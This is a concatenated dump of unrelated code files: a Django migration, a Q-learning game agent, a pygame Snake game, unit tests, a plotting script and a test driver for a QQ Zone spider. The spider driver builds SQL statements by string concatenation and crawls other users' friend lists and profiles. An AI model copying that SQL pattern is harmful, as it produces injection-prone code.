] | permissive | VirenKakasaniya/Roombooking-With-Django | d077fb039534325d816699ca3c7ac905f6c33b61 | 613e9bb9ee16ff2eb79782caca7480bdb095de57 | refs/heads/master | 2022-09-18T12:33:26.741868 | 2020-06-06T13:11:47 | 2020-06-06T13:11:47 | 269,979,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | # Generated by Django 3.0.3 on 2020-03-16 15:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0005_profile'),
]
operations = [
migrations.DeleteModel(
name='Reservation',
),
]
| [
"kakasaniyaviren1893@gmail.com"
] | kakasaniyaviren1893@gmail.com |
044aec0c5c23814bdfda79054ad101ae7c32827d | 326ecf9fd3b8ff5670dfd1faeb71504aac07452b | /Code/host-python/venv/Scripts/easy_install-3.7-script.py | 533d3be76b2f27a92232bdd4e87cc44d705a56bf | [] | no_license | y-cj123/beidou | 6dc4fbec8e23124fc16f31337e9b3d4a94c74e4f | 4b3a80cb8da4fb3464520024316b7399eb0bf457 | refs/heads/master | 2020-07-31T07:14:02.263772 | 2019-10-24T05:56:16 | 2019-10-24T05:56:16 | 210,526,165 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!D:\Users\JN\PycharmProjects\WpfApp\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"1975817668@qq.com"
] | 1975817668@qq.com |
65f9cfdb3e2d22893d9a562025b9bd322fc2b5d5 | ca8fe12def17494b4fd8a97664d7d9fcb1f9121f | /notifier.py | 5541ce560a39a17898c3957aad22a6fb585f744f | [] | no_license | pondelion/PassiveHealthMonitor | 0d52c71bc8b8aa327680ef7585bd24a608bd4385 | 4072c4c161a0d4d1c7e86931edb70b4c076e96e4 | refs/heads/main | 2023-04-25T16:06:12.784931 | 2021-05-15T03:49:35 | 2021-05-15T03:49:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | from abc import ABCMeta, abstractmethod
from overrides import overrides
class Notifier(metaclass=ABCMeta):
    """Abstract interface for notification channels used by the monitor.

    Concrete subclasses deliver an alert about a monitoring target.
    """

    @abstractmethod
    def notify(
        self,
        monitoring_target: str,
        notified_cpunt: int
    ) -> None:
        """Deliver one notification.

        Args:
            monitoring_target: Name of the monitored target.
            notified_cpunt: How many times this target has been notified.
                (NOTE: the original misspelling is kept on purpose —
                renaming it would break keyword-argument callers.)
        """
        raise NotImplementedError
class MockNotifier(Notifier):
    """Notifier that simply echoes each notification to stdout.

    Useful as a stand-in during development and testing.
    """

    @overrides
    def notify(
        self,
        monitoring_target: str,
        notified_cpunt: int
    ) -> None:
        """Print the target name and its notification count."""
        print(f'{monitoring_target} : {notified_cpunt}')


# Channel used when no explicit notifier is configured.
DefaultNotifier = MockNotifier
| [
"programming.deve@gmail.com"
] | programming.deve@gmail.com |
6d1d33b8e617fe23309aeba8ce6c41eca9dd1792 | 9f56ddc837f3559fc0b47216477084a1a040cb98 | /shortageConf/apps.py | c94e4ac535c15b926f426a85f35eb5351aabb447 | [] | no_license | davidgit888/opdashboard | 2dc498731324657da8c0fc2c0dec11f548ae0d24 | 5f67628860ad655c787bafa810ca7fbd649952a8 | refs/heads/master | 2022-12-06T13:28:44.169926 | 2020-02-17T06:07:24 | 2020-02-17T06:07:24 | 163,798,432 | 0 | 0 | null | 2022-12-04T14:55:23 | 2019-01-02T05:38:15 | HTML | UTF-8 | Python | false | false | 133 | py | from django.apps import AppConfig
class ShortageconfConfig(AppConfig):
    """Django app configuration for the shortage-configuration app."""

    name = 'shortageConf'
    verbose_name = '缺件配置'  # "shortage configuration" — label shown in the admin
| [
"rui.han@hexagon.com"
] | rui.han@hexagon.com |
95777f69b147a12e645c3e223346ef92efc6ea31 | 2afa477a46b3e20f890113107d421201474ecc77 | /game/intelligent_agent.py | 2643ec308963b9f09d6f8af0708582a839adf88e | [] | no_license | evangineer/Secure-Self-Attachment-Therapy | d7bb8b7e25f652ccf832b15cc6c969e6905e9853 | aa49cafa943669df6dad183b1e051e67df8b6394 | refs/heads/master | 2021-01-17T22:40:54.258810 | 2013-08-21T17:30:17 | 2013-08-21T17:30:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,771 | py | # This script contains the Intelligent Agent used in the game to guide the user.
# It is based of David Cittern's intelligent agent. It uses the GameLogic class and uses
# MDP, Q-learning algoritm and Ordinal Matrices to imitate the player.
# Q-learning equation: Q(s,a)' <- Q(s,a) + l*[R(s,s') + d*max[Q(s',a')] - Q(s,a)]
# where l: learning rate
# d: discount factor
# Ordinal Matrix: from avoidant: 2 | 3 to secure: 4 | 3
# ----- -----
# 1 | 4 1 | 2
# MDP: t | u where t: attend & go
# ----- u: ignore & go
# v | w v: attend & dont'go
# w: ignore & don't go
# AI Flow Chart:
#
# -------> Action ----------- Ordinal matrix -------------\
# | No | State Change?
# \--------------- Probability --------------/|
# | | Yes
# \--------- Q-Values ---------/
#
import renpy.store as store
import renpy.exports as renpy
from game_logic import GameLogic
import random
class IntelligentAgent(store.object):
    """Adult/child agent that imitates the player via Q-learning.

    Wraps a ``GameLogic`` payoff model over the four joint actions
    t/u/v/w (attend&go, ignore&go, attend&don't-go, ignore&don't-go),
    updates one Q value per chosen action, and selects actions with a
    softmax rule P(a) = k**Q(a) / sum(k**Q).  An ordinal ranking of the
    four payoffs is used to detect a change of attachment state, which
    resets the per-action learning-rate counters.
    """
    # initialize all the member variables
    def __init__(self):
        # AI contains the Game Logic
        self.ai_logic = GameLogic()
        # discount factor in the Q-learning algorithm
        self.discount = 0.4
        # k value for exploration
        self.k = 2
        self.adult_last_move = "first"
        self.change = 0
        self.t_count = 0
        self.u_count = 0
        self.v_count = 0
        self.w_count = 0
        # setup and initialize ordinal matrix
        self.ord_matrix = []
        self.ord_t = 0
        self.ord_u = 0
        self.ord_v = 0
        self.ord_w = 0
        self.update_ord_matrix()
        self.save_ord_matrix()
        # setup and initialize Q-value matrix
        # NOTE(review): assumes ai_logic.t/u/v/w are (child, adult) payoff
        # pairs and index [1] is the adult's reward — confirm in GameLogic.
        self.q_t = self.ai_logic.t[1]
        self.q_u = self.ai_logic.u[1]
        self.q_v = self.ai_logic.v[1]
        self.q_w = self.ai_logic.w[1]
        self.q_matrix = []
        self.update_q_matrix()
        # setup and initialize probability matrix
        self.probability_matrix = []
        self.update_probability_matrix()
    def reset_learning_rate(self):
        """Zero all per-action visit counters (learning rate is 1/count)."""
        self.t_count = 0
        self.u_count = 0
        self.v_count = 0
        self.w_count = 0
    # function to calculate new ordinal matrix with new state and store the ordinal matrix
    def update_ord_matrix(self):
        self.ai_logic.update_matrix()
        self.ord_matrix = []
        temp_matrix = [self.ai_logic.t[1], self.ai_logic.u[1], self.ai_logic.v[1], self.ai_logic.w[1]]
        # for each action, rank its reward against the other three,
        # giving one ordinal rank (1..4) per action
        for i in range(4):
            count = 1
            for j in range(4):
                if i == j:
                    continue
                if temp_matrix[i] > temp_matrix[j]:
                    count += 1
            self.ord_matrix.append(count)
    # store ordinal values in the class to remember
    def save_ord_matrix(self):
        self.ord_t = self.ord_matrix[0]
        self.ord_u = self.ord_matrix[1]
        self.ord_v = self.ord_matrix[2]
        self.ord_w = self.ord_matrix[3]
    # checks if the new calculated ordinal matrix is different to the old one, representing a change in state
    def ord_matrix_change(self):
        if (self.ord_t != self.ord_matrix[0] or self.ord_u != self.ord_matrix[1] or self.ord_v != self.ord_matrix[2] or self.ord_w != self.ord_matrix[3]):
            self.save_ord_matrix()
            return True
        return False
    # updates the q matrix with new values of Q for each state change
    def update_q_matrix(self):
        self.q_matrix = []
        self.q_matrix.append(self.q_t)
        self.q_matrix.append(self.q_u)
        self.q_matrix.append(self.q_v)
        self.q_matrix.append(self.q_w)
    # updates the Q value for action t.
    # Q(s,a) <- Q(s,a) + (1/visits) * [R + discount * max Q - Q(s,a)]
    def update_q_t(self):
        if self.t_count == 0:
            learning_rate = 1
        else:
            learning_rate = 1.0/self.t_count
        self.q_t = self.q_t + learning_rate*(self.ai_logic.t[1] + (self.discount * max(self.q_matrix)) - self.q_t)
    # updates the Q value for action u
    def update_q_u(self):
        if self.u_count == 0:
            learning_rate = 1
        else:
            learning_rate = 1.0/self.u_count
        self.q_u = self.q_u + learning_rate*(self.ai_logic.u[1] + (self.discount * max(self.q_matrix)) - self.q_u)
    # updates the Q value for action v
    def update_q_v(self):
        if self.v_count == 0:
            learning_rate = 1
        else:
            learning_rate = 1.0/self.v_count
        self.q_v = self.q_v + learning_rate*(self.ai_logic.v[1] + (self.discount * max(self.q_matrix)) - self.q_v)
    # updates the Q value for action w
    def update_q_w(self):
        if self.w_count == 0:
            learning_rate = 1
        else:
            learning_rate = 1.0/self.w_count
        self.q_w = self.q_w + learning_rate*(self.ai_logic.w[1] + (self.discount * max(self.q_matrix)) - self.q_w)
    # updates the probability matrix after a change in Q values
    # (softmax over Q with base self.k: P(a) = k**Q(a) / sum_b k**Q(b))
    def update_probability_matrix(self):
        self.probability_matrix = []
        self.update_q_matrix()
        total = 0
        for i in range(4):
            total += self.k ** self.q_matrix[i]
        self.probability_matrix.append((self.k**self.q_t)/total)
        self.probability_matrix.append((self.k**self.q_u)/total)
        self.probability_matrix.append((self.k**self.q_v)/total)
        self.probability_matrix.append((self.k**self.q_w)/total)
    # function called to inform the AI to make a move and returns the action in the form of [adult, child]
    def move(self):
        # random number from 0 to 1
        choice = random.random()
        # determine the probablistic range of each action
        # (cumulative probabilities: [0,prob_t) -> t, [prob_t,prob_u) -> u, ...)
        prob_t = self.probability_matrix[0]
        prob_u = self.probability_matrix[0]+self.probability_matrix[1]
        prob_v = self.probability_matrix[0]+self.probability_matrix[1]+self.probability_matrix[2]
        prob_w = 1
        # if t is chosen, adult attends
        if choice < prob_t:
            adult = "attend"
        # if u is chosen, adult ignores
        if prob_t <= choice and choice < prob_u:
            adult = "ignore"
        # if v is chosen, adult attends
        if prob_u <= choice and choice < prob_v:
            adult = "attend"
        # if w is chosen, adult ignores
        if prob_v <= choice and choice < prob_w:
            adult = "ignore"
        # find the action choice of the inner child given an adult's action choice
        child = self.child_move(adult)
        # find which action was chosen and update the specific Q value and probability matrix
        if adult == "attend" and child == "go":
            self.ai_logic.attend_go()
            self.ai_logic.update_matrix()
            self.update_ord_matrix()
            # checks if the action caused a change in the ordinal matrix
            if self.ord_matrix_change():
                self.change += 1
                self.reset_learning_rate()
            self.t_count += 1
            self.update_q_t()
            self.update_q_matrix()
            self.update_probability_matrix()
        if adult == "attend" and child == "dontgo":
            self.ai_logic.attend_dontgo()
            self.ai_logic.update_matrix()
            self.update_ord_matrix()
            if self.ord_matrix_change():
                self.change += 1
                self.reset_learning_rate()
            self.v_count += 1
            self.update_q_v()
            self.update_q_matrix()
            self.update_probability_matrix()
        if adult == "ignore" and child == "go":
            self.ai_logic.ignore_go()
            self.ai_logic.update_matrix()
            self.update_ord_matrix()
            if self.ord_matrix_change():
                self.change += 1
                self.reset_learning_rate()
            self.u_count += 1
            self.update_q_u()
            self.update_q_matrix()
            self.update_probability_matrix()
        if adult == "ignore" and child == "dontgo":
            self.ai_logic.ignore_dontgo()
            self.ai_logic.update_matrix()
            self.update_ord_matrix()
            if self.ord_matrix_change():
                self.change += 1
                self.reset_learning_rate()
            self.w_count += 1
            self.update_q_w()
            self.update_q_matrix()
            self.update_probability_matrix()
        return [adult, child]
    # this function prompts the child to choose an action given the adult's choice.
    # It picks the action with the greatest reward, if equal, then a random choice between go and don't go
    # NOTE(review): index [0] is read here (child's payoff, presumably) —
    # confirm against GameLogic's (child, adult) pair layout.
    def child_move(self, adult):
        if self.adult_last_move == "first":
            self.adult_last_move = adult
            child_action = random.random()
            if child_action <= 0.5:
                return "go"
            else:
                return "dontgo"
        if self.adult_last_move == "attend":
            self.adult_last_move = adult
            if self.ai_logic.t[0] > self.ai_logic.v[0]:
                return "go"
            elif self.ai_logic.t[0] < self.ai_logic.v[0]:
                return "dontgo"
            elif self.ai_logic.t[0] == self.ai_logic.v[0]:
                child_action = random.random()
                if child_action < 0.5:
                    return "go"
                else:
                    return "dontgo"
        if self.adult_last_move == "ignore":
            self.adult_last_move = adult
            if self.ai_logic.u[0] > self.ai_logic.w[0]:
                return "go"
            elif self.ai_logic.u[0] < self.ai_logic.w[0]:
                return "dontgo"
            elif self.ai_logic.u[0] == self.ai_logic.w[0]:
                child_action = random.random()
                if child_action < 0.5:
                    return "go"
                else:
                    return "dontgo"
    # checks if the AI won the game given an action pair
    def check_win(self, adult, child):
        return self.ai_logic.check_win(adult, child)
    # returns the number of rounds the AI has played
    def get_round(self):
        return self.ai_logic.round
"zero.caleb@gmail.com"
] | zero.caleb@gmail.com |
6c5a5c0f95d2a5a614ffe10e688fb03a6e36acf4 | d1fca4af511d0cfad53100e860c10a10345e95cd | /EntregasProyecto/SuanaCordovaYPaolaMartinez/PilarVazquez.py | b5de73a107a287fcc9b7f3be0f9c36746e7f3159 | [] | no_license | pcruiher08/SnakeGame | d27c4ffbb1fd9e38b6f0e60658dad93857077777 | 69a78e1503c7448c3d2c8a721f91b1926c2e2db8 | refs/heads/master | 2022-12-02T10:49:13.113066 | 2020-08-07T23:23:12 | 2020-08-07T23:23:12 | 277,183,237 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,538 | py | # Libraries
import pygame, random
# Colors (RGB tuples)
black=(0,0,0)
background=(231,197,130)
green=(77,228,145)
red=(255,38,78)
# Variables — module-level game state mutated via `global` by the functions below
running=True
pause=False
screenSize=500
pixelSize=10
speed=10
direction="RIGHT"
game_over=False
pause=False  # NOTE(review): duplicate assignment; `pause` was already set above
headX=50
headY=50
screen=pygame.display.set_mode((screenSize,screenSize))
snake=[(headX,headY)]  # list of (x, y) segments; index 0 is the head
# Coordinates — snack spawns on the 10-px grid inside the 50..440 play area
randomX=random.randrange(50,450,10)
randomY=random.randrange(50,450,10)
snack=[(randomX,randomY)]
# Functions
def initialization():
    """Start pygame and set the window title."""
    pygame.init()
    pygame.display.set_caption("Snake Game")
def checkEvents(events):
    """Clear the global run flag if any event is a window-close request."""
    global running
    if any(ev.type == pygame.QUIT for ev in events):
        running = False
def drawSnake(screen, snake):
    """Render every snake segment as a green square of side ``pixelSize``."""
    global pixelSize
    for seg_x, seg_y in snake:
        pygame.draw.rect(screen, (green), (seg_x, seg_y, pixelSize, pixelSize))
def moveSnake(direction, snake):
    """Advance *snake* one grid step in *direction*.

    Drops the tail segment and inserts a new head offset by the global
    ``speed``; an unknown direction re-inserts the old head unchanged.
    """
    global speed
    head_x, head_y = snake[0]
    offsets = {
        "UP": (0, -speed),
        "DOWN": (0, speed),
        "RIGHT": (speed, 0),
        "LEFT": (-speed, 0),
    }
    dx, dy = offsets.get(direction, (0, 0))
    snake.pop()
    snake.insert(0, (head_x + dx, head_y + dy))
def drawSnack(screen,snack):
    """Render the snack as a red square of side ``pixelSize``."""
    global pixelSize
    pygame.draw.rect(screen,(red),(snack[0][0],snack[0][1],pixelSize,pixelSize))
def Snake_Snack(snake,snack,screen):
    """Handle the head-vs-snack collision: grow the snake and respawn the snack."""
    def addPixel(snake):
        # Duplicate the head; the extra segment separates on the next move.
        newX=snake[0][0]
        newY=snake[0][1]
        snake.insert(0,(newX,newY))
    def redrawSnack(screen,snack):
        # Pick a new grid cell for the snack inside the 50..440 play area.
        randomX=random.randrange(50,450,10)
        randomY=random.randrange(50,450,10)
        global pixelSize
        pygame.display.flip()
        snack.pop()
        snack.insert(0,(randomX,randomY))
    if snake[0]==snack[0]:
        addPixel(snake)
        redrawSnack(screen,snack)
def Snake_Snake(snake):
    """Set the global game-over flag when the head overlaps a later body segment."""
    global game_over
    head = snake[0]
    if head in snake[2:]:
        game_over = True
def Snake_Screen(snake):
    """Set the global game-over flag when the head leaves the playfield."""
    global screenSize
    global game_over
    head_x, head_y = snake[0]
    limit = screenSize - 10
    if not (0 <= head_x <= limit) or not (0 <= head_y <= limit):
        game_over = True
def k_direction(keys,headX,headY):
    """Update the global ``direction`` from the arrow keys.

    Reversing straight into the snake (e.g. RIGHT while moving LEFT) is
    disallowed.  The returned (headX, headY, direction) tuple is ignored by
    the caller in main(); only the global ``direction`` assignment matters.
    """
    global direction
    global speed
    if keys[pygame.K_RIGHT] and direction!="LEFT":
        direction="RIGHT"
        headX+=speed
    elif keys[pygame.K_LEFT] and direction!="RIGHT":
        direction="LEFT"
        headX-=speed
    elif keys[pygame.K_UP] and direction !="DOWN":
        direction="UP"
        headY-=speed
    elif keys[pygame.K_DOWN] and direction !="UP":
        direction="DOWN"
        headY+=speed
    return headX,headY, direction
def drawGame_Over(game_over):
    """When *game_over* is set, draw the game-over screen (title, score, restart hint)."""
    global screenSize
    global running
    def drawRestart(screen):
        # Hint for the restart key handled by restart().
        font=pygame.font.SysFont("serif",30)
        text= font.render("Play again: R",True,black)
        X=(250)-(text.get_width()//2)
        Y=(350)-(text.get_height()//2)
        screen.blit(text,((X,Y)))
    def drawScore(screen):
        # Shadows the module-level drawScore on purpose: bigger font, centered.
        score=(len(snake)*10)-10
        font=pygame.font.SysFont("serif",30)
        text= font.render((f"Your score: {score}"),True,black)
        X=(250)-(text.get_width()//2)
        Y=(150)-(text.get_height()//2)
        screen.blit(text,((X,Y)))
    if game_over:
        screenG_O=pygame.display.set_mode((screenSize,screenSize))
        # Keep the window responsive to a close request while game over is shown.
        for event in pygame.event.get():
            if event.type==pygame.QUIT:
                running=False
        screenG_O.fill(background)
        font=pygame.font.SysFont("serif",50)
        text= font.render("GAME OVER",True,black)
        centerX=(screenSize//2)-(text.get_width()//2)
        centerY=(screenSize//2)-(text.get_height()//2)
        screenG_O.blit(text,[centerX,centerY])
        drawRestart(screenG_O)
        drawScore(screenG_O)
        pygame.display.flip()
def drawScore(screen):
    """Draw the in-game score (10 points per eaten snack) in the top-right corner."""
    score=(len(snake)*10)-10
    font=pygame.font.SysFont("serif",20)
    text= font.render((f"Your score: {score}"),True,black)
    X=(400)-(text.get_width()//2)
    Y=(20)-(text.get_height()//2)
    screen.blit(text,((X,Y)))
def paused(keys):
    """Toggle pause on the P key and block in a pause screen until P is pressed again.

    NOTE(review): unpausing calls main() recursively instead of returning to
    the caller's loop, so each pause/unpause cycle adds a stack frame.
    """
    global running
    global pause
    if keys[pygame.K_p]:
        pause=True
        running=False
    while pause:
        font=pygame.font.SysFont("serif",50)
        text= font.render("PAUSE",True,black)
        centerX=(250)-(text.get_width()//2)
        centerY=(250)-(text.get_height()//2)
        screen.blit(text,(centerX,centerY))
        pygame.display.flip()
        # Sleep until any event arrives, then sample the keyboard state.
        pygame.event.wait()
        keys=pygame.key.get_pressed()
        if keys[pygame.K_p]:
            pause=False
            running=True
            main()
def restart(keys):
    """On the R key, reset all global game state and start a new game.

    NOTE(review): like paused(), this re-enters main() recursively rather
    than returning, so repeated restarts grow the call stack.
    """
    global running
    global pause
    global game_over
    global direction
    global headX
    global headY
    global snake
    global randomX
    global randomY
    global snack
    if keys[pygame.K_r]:
        if not running:
            running=True
        if pause:
            pause=False
        if game_over:
            game_over=False
        # Reset snake and snack to their initial configuration.
        direction="RIGHT"
        headX=50
        headY=50
        snake=[(headX,headY)]
        randomX=random.randrange(50,450,10)
        randomY=random.randrange(50,450,10)
        snack=[(randomX,randomY)]
        main()
# Principal fuction
def main():
    """Run the main game loop at 10 FPS until the global run flag is cleared.

    Each frame: poll events, read the keyboard, advance and draw the snake
    and snack, run collision checks, and handle game-over/pause/restart.
    """
    # Global variables
    global running
    global pause
    global screenSize
    global game_over
    global headX
    global headY
    global direction
    # Initialization
    initialization()
    screen=pygame.display.set_mode((screenSize,screenSize))
    while running:
        clock=pygame.time.Clock()
        # Events
        events=pygame.event.get()
        checkEvents(events)
        # Background color
        screen.fill(background)
        # Keys (return value unused; k_direction updates the global direction)
        keys=pygame.key.get_pressed()
        k_direction(keys,headX,headY)
        # Functions
        drawScore(screen)
        moveSnake(direction,snake)
        drawSnake(screen,snake)
        drawSnack(screen,snack)
        # Collisions
        # Snake-Snack
        Snake_Snack(snake,snack,screen)
        # Snake-Snake
        Snake_Snake(snake)
        # Snake-Screen
        Snake_Screen(snake)
        # Game_Over
        drawGame_Over(game_over)
        # Paused
        paused(keys)
        # Restart
        restart(keys)
        # Update the display
        pygame.display.flip()
        clock.tick(10)
    # Bug fix: the original `pygame.quit` was a bare attribute access (a
    # no-op); it must be called to shut pygame down.
    pygame.quit()
main()
# python .\Snake.py | [
"pcruiher089@gmail.com"
] | pcruiher089@gmail.com |
26b5869a3a73a98502d47e4cb090fc004ff119f9 | c651e102de29f75a66daf5411bc3f3ddb49525ce | /day2_Homework/day2HW1.py | 23e4234ce046d6430c1141a30d3a3cdcd18cd315 | [] | no_license | ArtKorman/cmdb-bootcamp-homework | b926acf320cb97810d229fbee2ba6d29592bc76d | 3c795050d2651eb9aed2664b1d4ef5c65fe375f6 | refs/heads/master | 2021-01-09T22:46:17.082937 | 2014-09-08T02:48:44 | 2014-09-08T02:48:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | #! /usr/bin/env python
import pandas as pd
import matplotlib.pyplot as plt
# Box-plot the gene-expression (FPKM) distribution of the top, middle and
# bottom thirds of genes for a male (SRR072893) and female (SRR072915) sample.
cufflinks_output = "/Users/cmdb/data/results/SRR072893_clout/genes.fpkm_tracking"
cufflinks_output2 = "/Users/cmdb/data/results/SRR072915_clout/genes.fpkm_tracking"

df = pd.read_table( cufflinks_output )
df2 = pd.read_table( cufflinks_output2 )

# NOTE(review): DataFrame.sort is the pre-0.17 pandas API this script was
# written against; on modern pandas use sort_values("FPKM", ...) instead.
# The original hard-coded cut points 5200/10400 assumed ~15600 genes; the
# thirds are derived from the table length here so other gene counts split
# evenly too.

#Male Data
third = len(df) // 3
top = df.sort("FPKM", ascending=False)["FPKM"] [0:third]
middle = df.sort("FPKM", ascending=False) ["FPKM"] [third:2*third]
bottom = df.sort("FPKM", ascending=False) ["FPKM"] [2*third:]
data_set = [top, middle, bottom]
fig = plt.figure()  # bug fix: plt.figure was referenced but never called
plt.boxplot(data_set)
plt.savefig("Box_Male")
# Bug fix: close the male figure so the female boxplot below is drawn on a
# fresh figure instead of on top of the male one.
plt.close(fig)

#Female Data
third2 = len(df2) // 3
top2 = df2.sort("FPKM", ascending=False)["FPKM"] [0:third2]
middle2 = df2.sort("FPKM", ascending=False) ["FPKM"] [third2:2*third2]
bottom2 = df2.sort("FPKM", ascending=False) ["FPKM"] [2*third2:]
data_set2 = [top2, middle2, bottom2]
fig = plt.figure()
plt.boxplot(data_set2)
plt.savefig("Box_Female")
"IArthurKormanI@gmail.com"
] | IArthurKormanI@gmail.com |
d9f6a916bca93eb5d16e2396026df0aa948f93f2 | 9b3863c6c1a7ee609e10e9a3f147724ebbcba541 | /graph_search/component_manager_test.py | 562678f0c9a9b3a5f3c41ce72da4d77bfe5afa7c | [] | no_license | naveenprao/algorithm | ad1745267f1def681889390ab64ecf7f7a899bcf | c95019ed279dd98e2d18c3d868263bb8242db0e9 | refs/heads/master | 2021-05-04T08:46:26.561369 | 2017-03-21T19:53:16 | 2017-03-21T19:53:16 | 70,366,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | import unittest
from component_manager import ComponentManager
class TestAdd(unittest.TestCase):
    """add_component should register each component in the dependency graph."""
    def test_add_two_component(self):
        cm = ComponentManager()
        cm.add_component('pgm1')
        cm.add_component('pgm2')
        # assertEqual reports actual vs expected on failure, unlike
        # assertTrue(len(...) == 2) which only says "False is not true".
        self.assertEqual(len(cm.dep_graph), 2)
class TestMakeDependent(unittest.TestCase):
def test_make_dependent(self):
cm = ComponentManager()
cm.add_component('pgm1')
cm.add_component('pgm2')
cm.make_dependent('pgm1', 'pgm2')
print 'depends graph', cm.dep_graph
print 'used by graph', cm.usedby_graph
self.assertTrue(len(cm.dep_graph['pgm2']) == 0)
self.assertTrue(len(cm.usedby_graph['pgm1']) == 0)
self.assertTrue('pgm1' in cm.usedby_graph['pgm2'])
self.assertTrue('pgm2' in cm.dep_graph['pgm1'])
class TestRemove(unittest.TestCase):
    """Exercises ComponentManager.remove on a chain and on a cyclic graph.

    NOTE(review): neither test asserts anything — they only print the
    resulting graphs, so they can never fail.  Add assertions on the
    expected post-remove graph contents once remove()'s semantics (does it
    cascade through now-unused dependencies?) are confirmed.
    """
    def test_remove(self):
        # Chain A -> B -> C with D -> C, then remove A.
        cm = ComponentManager()
        cm.add_component('A')
        cm.add_component('B')
        cm.add_component('C')
        cm.add_component('D')
        cm.make_dependent('A', 'B')
        cm.make_dependent('B', 'C')
        cm.make_dependent('D', 'C')
        #cm.print_graph()
        cm.remove('A')
        cm.print_graph()
    def test_remove_cycle(self):
        # Cycle B -> C -> D -> B, reachable from A and E; remove A.
        cm = ComponentManager()
        cm.add_component('A')
        cm.add_component('B')
        cm.add_component('C')
        cm.add_component('D')
        cm.add_component('E')
        cm.make_dependent('A', 'B')
        cm.make_dependent('B', 'C')
        cm.make_dependent('C', 'D')
        cm.make_dependent('D', 'B')
        cm.make_dependent('E', 'D')
        cm.remove('A')
        cm.print_graph()
# Allow running this module directly: discover and run the TestCase classes.
if __name__ == '__main__':
    unittest.main()
| [
"nrao@salesforce.com"
] | nrao@salesforce.com |
997b8530fba349b6c10f6d4738fbf52fe30b43e3 | 75769a749295320029d3a3b500a4b5a917638e4d | /qzone/login/testMain.py | 13d06ea5e8c87c01993f6072cb3e522c892f8811 | [] | no_license | haiboz/qzoneSpider | ed21b09a581eebbaf830b3e438806116523f1280 | bcd25f6fc6fe8583128e8c51a0112e1f288eee6c | refs/heads/master | 2021-01-20T15:59:30.735837 | 2016-07-15T16:33:30 | 2016-07-15T16:33:30 | 62,299,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,968 | py | #coding:utf8
'''
Created on 2016-6-24
@author: 浮生若梦
'''
import sqlConnect
from qzone.spiderUtils import qqParser
from qzone.login import login
import qZoneMain
import time
#
class TestMain(object):
    """Ad-hoc manual test driver for the QZone spider components (Python 2).

    Bundles the mood/friend parser, the crawler main, the SQL connector and
    the login helper, with one method per scenario.  SECURITY NOTE: the SQL
    statements below are built by string concatenation — vulnerable to SQL
    injection; they should use parameterized queries.
    """
    def __init__(self):
        self.parser = qqParser.QQParser()
        self.qZoneMain = qZoneMain.QQMain()
        self.sqlConnect = sqlConnect.SQLConnect()
        self.login = login.QZoneLogin()
        # Fixed QQ account number used by the scenarios below.
        self.qq = "1069757861"
    def testIns(self):
        """Parse moods for the fixed QQ and build (but not execute) an INSERT."""
        qq = self.qq
        self.parser.parseMood(qq)
        connect = sqlConnect.SQLConnect()
        # conn = connect.connect()
        # cursor = conn.cursor()
        content = "content"
        date = "2016-01-02"
        scount = "2"
        pcount = "3"
        zcount = "5"
        sql = "insert into mood(mood_id,date,mood_content,support_count,comment_count,forward_count) values('"+qq+"','"+date+"','"+content+"',"+scount+","+pcount+","+zcount+")"
        # connect.insert(sql)
    def testParseQQFrind(self):
        """Parse the friend list of the fixed QQ account."""
        print "testParseQQFrind"
        self.parser.parseQQFriend(self.qq)
    def testInsertQQ(self, qq):
        """Mark *qq* as already dealt with in the crawler's bookkeeping."""
        self.qZoneMain.insertDealtQQ(qq)
        pass
    def testInsertSpicelSignl(self):
        '''Test inserting a string with special characters (quote + CJK) via SQL.'''
        content = "it's 自动释放 or never"
        # content = content.replace("'", "\\'")
        sql = "insert test(content) values ('"+content+"')"
        self.sqlConnect.insert(sql)
        print "success"
        pass
    def testGetLoginQQ(self):
        """Print the first nine stored (qq, password) login credentials."""
        count = 1
        while count < 10:
            qq,pwd = self.login.getInitInfo(count)
            print qq
            print pwd
            count = count + 1
        pass
    def testQQLogin(self):
        """Log in with credential slot 2 and return the driving browser."""
        browser = self.login.loginQQ(2)
        return browser
return browser
# Manual driver: most scenarios are commented out; as committed this only
# prints the current local time.
if __name__ == "__main__":
    testMain = TestMain()
    currentQQ = 1145426412
    #
    # testMain.testIns()
    # testMain.testParseQQFrind()
    # testMain.testInsertQQ("798102408")
    # testMain.testInsertSpicelSignl()
    # testMain.testGetLoginQQ()
    # browser = testMain.testQQLogin()
    # # currentQQ = 1145426412
    # currentQQ = 2425705688
    # testMain.qZoneMain.crawUserInfo(browser, currentQQ)
    # browser.quit()
    # testMain.parser.parseUserInfo(currentQQ)
    ISOTIMEFORMAT="%Y-%m-%d %X"
    tt = time.strftime( ISOTIMEFORMAT, time.localtime() )
    # "shijian" is pinyin for 时间 ("time").
    print "shijian:"+tt
| [
"798102408@qq.com"
] | 798102408@qq.com |
eb84f4f3aa5f7e87dd2f03dcbcfa66d736fc84e6 | 17870e3a15504a7054ef59a532322baa39edba19 | /web/web.py | 09db76fc591b49e0e0e84c1ca5d81e194e99e396 | [] | no_license | lorabit/yuerec | d1e2f86d1d7e1b869d3db93f3967db0150c02f85 | dfe036ff1e5180189d467723dbf4387b092ed5cc | refs/heads/master | 2021-01-01T16:05:42.754210 | 2017-10-25T02:52:15 | 2017-10-25T02:52:15 | 24,885,108 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,686 | py | # all the imports
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, \
abort, render_template, flash, json, send_file
import settings
import time
import Image
import os
app = Flask(__name__)
app.config.from_object(settings)
def connect_db():
    """Open a new SQLite connection to the configured database file."""
